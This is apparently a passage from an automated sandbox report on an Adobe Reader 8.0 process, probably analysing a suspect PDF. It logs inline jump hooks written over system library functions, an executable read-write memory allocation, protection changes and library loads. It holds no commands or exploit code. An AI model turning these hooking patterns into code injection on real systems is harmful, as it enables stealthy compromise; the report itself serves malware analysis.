1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 5FDF078
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 5FDF078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0000 10 B8 35 00 00 00 E9 A9 D1 94 75 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C90D1AE 5 E9 A4 AE 6C 89 success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC000A 10 68 6C 02 00 00 E9 1E 63 95 75 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C91632D 5 E9 09 1F 6C 89 success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0014 10 8B FF 55 8B EC E9 A3 2E 25 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212EBC 5 E9 FD 4B DB 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC001E 10 8B FF 55 8B EC E9 7E 60 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C60A1 5 E9 6F 1A E0 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0028 10 8B FF 55 8B EC E9 94 E9 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771CE9C1 5 E9 A6 91 DF 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0032 10 8B FF 55 8B EC E9 8A 2F 25 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212FC1 5 E9 4B 4C DB 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC003C 10 8B FF 55 8B EC E9 4B 4D 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C4D8C 5 E9 25 2F E0 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0046 10 8B FF 55 8B EC E9 9F 82 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C82EA 5 E9 0A FA DF 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0050 10 8B FF 55 8B EC E9 AB 90 23 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9100 5 E9 34 EC DC 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC005A 10 8B FF 55 8B EC E9 98 89 21 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D89F7 5 E9 8B F3 DE 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0064 12 6A 2C 68 10 7B 1C 77 E9 59 79 20 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C79C2 5 E9 F0 03 E0 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0070 10 8B FF 55 8B EC E9 DE 9B 23 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9C53 5 E9 B4 E1 DC 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC007A 10 8B FF 55 8B EC E9 E5 8F 21 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D9064 5 E9 BB ED DE 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0084 10 8B FF 55 8B EC E9 4F B1 1F 70 success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771BB1D8 5 E9 5F CC E0 8E success or wait 1 5FDF11A
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC008E 10 8B FF 55 8B EC E9 98 3D AF 6A success or wait 1 5FDF0EC
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB3E2B 5 E9 3E E9 51 94 success or wait 1 5FDF11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 116B0000 116AF8C8 page read and write success or wait 1 5FDA5EB
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 116B0000 116AF8CC page read and write success or wait 1 5FDA5EB
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 6FC0000 116AF4C0 page execute and read and write success or wait 1 5FE3FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 2FC00AE 1000 page execute and read and write page execute and read and write success or wait 1 2FC00C7
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 5FDF04F
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 5FDF134
1732 C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 5FDF04F
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 5FE8879
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2509752163
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2509756143
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 280000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2509759863
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 2A0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2509761223
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2F0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2509762347
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 340000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2509763099
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 340000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2509764418
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 340000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2509772835
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2509775636
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2509776941
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2509784165
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2509787375
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2509791696
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2509797671
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2509801664
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2509807056
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcp80.dll Access: query and write and read and execute Type: image Baseaddress: 7C420000 Size: 552960 Protection: read write Mapped to pid: own pid success or wait 2509818565
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.3053_x-ww_b80fa8ca\msvcr80.dll Access: query and write and read and execute Type: image Baseaddress: 78130000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2509822618
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 634880 Protection: read write Mapped to pid: own pid object name not found 2509831112
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2509832686
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 460000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2509914609
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2509936720
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 475136 Protection: execute Mapped to pid: own pid success or wait 2509940615
Section loaded Path: C:\WINDOWS\AppPatch\aclayers.dll Access: query and write and read and execute Type: image Baseaddress: 71590000 Size: 495616 Protection: read write Mapped to pid: own pid success or wait 2509942659
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2509950231
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2509959019
Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2509967305
Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2509968981
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2509981553
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2510030950
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2510033680
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2510035889
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 940000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2510061208
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 940000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2510125291
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2510128030
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3F0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2510140127
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3F0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2510143049
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3F0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2510145525
Section loaded Path: \KnownDlls\AcroRd32.dll Access: write and read and execute Type: unknown Baseaddress: 3F0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 2510223187
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.dll Access: query and write and read and execute Type: image Baseaddress: 960000 Size: 14249984 Protection: read write Mapped to pid: own pid conflicting addresses 2510224761
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2510516726
Section loaded Path: \KnownDlls\AGM.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2510521858
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AGM.dll Access: query and write and read and execute Type: image Baseaddress: 6000000 Size: 4939776 Protection: read write Mapped to pid: own pid success or wait 2510523506
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2510551498
Section loaded Path: \KnownDlls\CoolType.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2510564942
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\CoolType.dll Access: query and write and read and execute Type: image Baseaddress: 8000000 Size: 2334720 Protection: read write Mapped to pid: own pid success or wait 2510566625
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 8000000 Size: 2334720 Protection: read write Mapped to pid: own pid object name not found 2510607963
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2510609741
Section loaded Path: \KnownDlls\BIB.dll Access: write and read and execute Type: unknown Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid object name not found 2510616547
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\BIB.dll Access: query and write and read and execute Type: image Baseaddress: 7000000 Size: 106496 Protection: read write Mapped to pid: own pid success or wait 2510618177
Section loaded Path: \KnownDlls\ACE.dll Access: write and read and execute Type: unknown Baseaddress: 7000000 Size: 106496 Protection: read write Mapped to pid: own pid object name not found 2510643306
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\ACE.dll Access: query and write and read and execute Type: image Baseaddress: 5000000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2510645023
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 17D0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2510797096
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 17D0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2510957430
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2510960418
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2510971511
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 17E0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2510981074
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 1920000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 2510991982
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: 1920000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 2510995825
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 1920000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 2511000345
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: 1920000 Size: 180224 Protection: readonly Mapped to pid: own pid success or wait 2511003659
Section loaded Path: \KnownDlls\apphelp.dll Access: write and read and execute Type: unknown Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2511006724
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 1920000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2511048419
Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 1920000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 2511064734
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 1930000 Size: 180224 Protection: execute Mapped to pid: own pid success or wait 2511067907
Section loaded Path: C:\WINDOWS\system32\msctfime.ime Access: query and write and read and execute Type: image Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 2511071184
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 1930000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2511095219
Section loaded Path: \KnownDlls\SETUPAPI.dll Access: write and read and execute Type: unknown Baseaddress: 1930000 Size: 1208320 Protection: readonly Mapped to pid: own pid object name not found 2511224415
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2511227036
